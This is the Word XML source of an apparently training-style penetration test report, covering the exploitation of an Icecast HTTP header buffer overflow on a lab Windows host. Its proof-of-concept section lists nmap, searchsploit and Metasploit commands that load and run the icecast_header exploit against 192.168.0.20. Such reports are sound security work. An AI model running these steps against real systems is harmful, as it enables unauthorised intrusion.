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089E" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286777C8" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="007E6AC9">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Penetration Test Report </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246AFA17" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3709144E" w14:textId="6F716109" w:rsidR="000F605D" w:rsidRDefault="00EC326C">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00580E0E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="de-DE"/>
          </w:rPr>
          <w:t>BenQualey</w:t>
        </w:r>
        <w:r w:rsidRPr="00580E0E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>@GoodSecurity.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="725CC6E7" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C479290" w14:textId="777CA8C0" w:rsidR="000F605D" w:rsidRPr="00580E0E" w:rsidRDefault="00EC326C" w:rsidP="00580E0E">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00580E0E">
        <w:t>4-27-2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CE87E4" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E3FE6C1" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54846B67" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771940D5" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED9133B" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C38EFC" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51511723" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF17F65" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B10BD4" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001F7818" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="524EED6A" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F6CAED" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ED3C45B" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D20C43B" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D14D7EF" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23ACD720" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C59E4C" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1056A1E1" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="668CE72A" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="468D1976" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E16B097" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378159D6" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="007E6AC9">
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>High-Level Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78603D6E" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F21AB3C" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="007E6AC9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was tasked with performing an internal penetration test on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodCorp’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> CEO, Hans Gruber. An internal penetration test is a dedicated attack against internally connected systems. The goal of this test is to perform attacks similar to those of a hacker and attempt to infiltrate Hans’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">computer </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to determine if it is at risk. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> overall objective was to exploit any vulnerable software, find a secret recipe file on Hans’ computer, and report the findings back to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodCorp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2E374" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="007E6AC9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The internal penetration test found several alarming vulnerabilities </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>on Hans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’ computer: When performing the attacks, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was able to gain access to his machine and find the secret recipe file by exploiting two programs with major vulnerabilities. The details of the attack are below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECCBDFF" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="007E6AC9">
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA1A5D8" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576430E0" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="007E6AC9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>Machine IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503333F6" w14:textId="0398F7D4" w:rsidR="00580E0E" w:rsidRPr="00465788" w:rsidRDefault="000F73F9" w:rsidP="00580E0E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465788">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E683CDC" w14:textId="77777777" w:rsidR="00580E0E" w:rsidRPr="00580E0E" w:rsidRDefault="00580E0E" w:rsidP="00580E0E"/>
    <w:p w14:paraId="44B115DC" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="007E6AC9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t>Hostname:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD638C6" w14:textId="22FF4A2D" w:rsidR="000F73F9" w:rsidRPr="00465788" w:rsidRDefault="000F73F9" w:rsidP="00580E0E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00465788">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MSEDGEWIN10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CD789D" w14:textId="77777777" w:rsidR="00580E0E" w:rsidRPr="00580E0E" w:rsidRDefault="00580E0E" w:rsidP="00580E0E"/>
    <w:p w14:paraId="1C8DC977" w14:textId="080B1FF9" w:rsidR="000F605D" w:rsidRDefault="007E6AC9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D48E979" w14:textId="1FF38A48" w:rsidR="000F73F9" w:rsidRDefault="000F73F9" w:rsidP="00580E0E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00580E0E">
        <w:t>Icecast_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D0CB523" w14:textId="77777777" w:rsidR="00580E0E" w:rsidRPr="00580E0E" w:rsidRDefault="00580E0E" w:rsidP="00580E0E"/>
    <w:p w14:paraId="0F661090" w14:textId="2651EE24" w:rsidR="000F605D" w:rsidRDefault="007E6AC9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3029A2F0" w14:textId="0D9B251F" w:rsidR="000F73F9" w:rsidRDefault="000F73F9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Knowing the vulnerable servers IP address and that it was running an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server, </w:t>
      </w:r>
      <w:r w:rsidR="00580E0E">
        <w:t>I was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> able to connect to the system through a vulnerability within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and how it handles remote traffic. This allowed access to the server as a whole and not just the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> service. </w:t>
      </w:r>
      <w:r w:rsidR="00350F2C">
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00D3389E">
        <w:t xml:space="preserve"> attack is </w:t>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidR="00D3389E">
        <w:t xml:space="preserve">a “buffer overflow” that allows for code execution via an HTTP request. It is caused by how </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D3389E">
        <w:t>icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D3389E">
        <w:t xml:space="preserve"> parses out the http headers </w:t>
      </w:r>
      <w:r w:rsidR="0071083A">
        <w:t xml:space="preserve">it receives. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710110B0" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="007E6AC9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:t>Severity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EA1444" w14:textId="10C0BCD8" w:rsidR="000F605D" w:rsidRPr="009F4C06" w:rsidRDefault="000F73F9" w:rsidP="009F4C06">
      <w:r w:rsidRPr="009F4C06">
        <w:t>This is very severe</w:t>
      </w:r>
      <w:r w:rsidR="009F4C06" w:rsidRPr="009F4C06">
        <w:t xml:space="preserve"> if it is not updated</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4C06">
        <w:t xml:space="preserve"> because it is not limited to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F4C06">
        <w:t>icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F4C06">
        <w:t xml:space="preserve"> service, this can compromise the entire </w:t>
      </w:r>
      <w:r w:rsidR="00465788">
        <w:t>machine</w:t>
      </w:r>
      <w:r w:rsidR="00450B38" w:rsidRPr="009F4C06">
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00450B38" w:rsidRPr="009F4C06">
        <w:t>icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00450B38" w:rsidRPr="009F4C06">
        <w:t xml:space="preserve"> is installed on. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62896472" w14:textId="77777777" w:rsidR="009F4C06" w:rsidRDefault="009F4C06">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1856EF" w14:textId="4709EB01" w:rsidR="000F605D" w:rsidRDefault="007E6AC9">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C3164B" w14:textId="77777777" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326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Perform a service and version scan using Nmap to determine which services are up and running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143B3143" w14:textId="32E90DDD" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Run the Nmap command that performs a service and version scan against the target.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br/>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>Command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: </w:t>
      </w:r>
      <w:r w:rsidR="00465788">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>`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nmap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 -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sV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 192.168.0.20</w:t>
      </w:r>
      <w:r w:rsidR="00465788">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDD8E0A" w14:textId="5669FF2E" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="659A7563" wp14:editId="67417D1F">
            <wp:extent cx="5943600" cy="2693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E009" w14:textId="77777777" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326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From the previous step, we see that the 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Icecast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 service is running. Let's start by attacking that service. Search for any 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Icecast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 exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2505A146" w14:textId="1C3DB77B" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Run the 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SearchSploit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 commands to show available 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Icecast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 exploits.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br/>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>Command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: `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searchsploit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 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icecast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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6408B266" w14:textId="09D3C05A" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7196481B" wp14:editId="67C84A35">
            <wp:extent cx="5943600" cy="261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E732" w14:textId="77777777" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326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Now that we know which exploits are available to us, let's start Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A23178" w14:textId="3E84CBCA" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Run the command that starts Metasploit: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br/>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>Command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: `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msfconsole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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E50AD4D" w14:textId="77777777" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326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Search for the 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Icecast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 module and load it for use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48151B3E" w14:textId="7A08070D" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Run the command to search for the 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Icecast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 module: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br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>Comman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: `search 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icecast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`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC3032B" w14:textId="2A2D22FA" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D59184A" wp14:editId="4D25474D">
            <wp:extent cx="5943600" cy="212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D8D2C" w14:textId="3CB1A0F0" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Run the command to use the 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Icecast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 module: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br/>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>Command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: </w:t>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>`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use exploit/windows/http/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icecast_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFD90E5" w14:textId="2803FC42" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E0598B0" wp14:editId="1A50C78C">
            <wp:extent cx="4250055" cy="373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9F12" w14:textId="77777777" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Alternatively: `use 0` (if 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icecast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 has been searched)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125F5560" w14:textId="72ACAB18" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47BF6E8E" wp14:editId="18223089">
            <wp:extent cx="5943600" cy="2251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03A3" w14:textId="77777777" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326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Set the RHOST to the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A77429" w14:textId="46C0939E" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Run the command that sets the RHOST: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br/>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>Command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: </w:t>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>`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set RHOST 192.168.0.20</w:t>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17200AC2" w14:textId="77777777" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Run the 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Icecast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 exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4349815A" w14:textId="7B842856" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Run the command that runs the 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Icecast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 exploit.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br/>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>Command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: `run`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F44178" w14:textId="04D4C0D5" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16011687" wp14:editId="31682EB6">
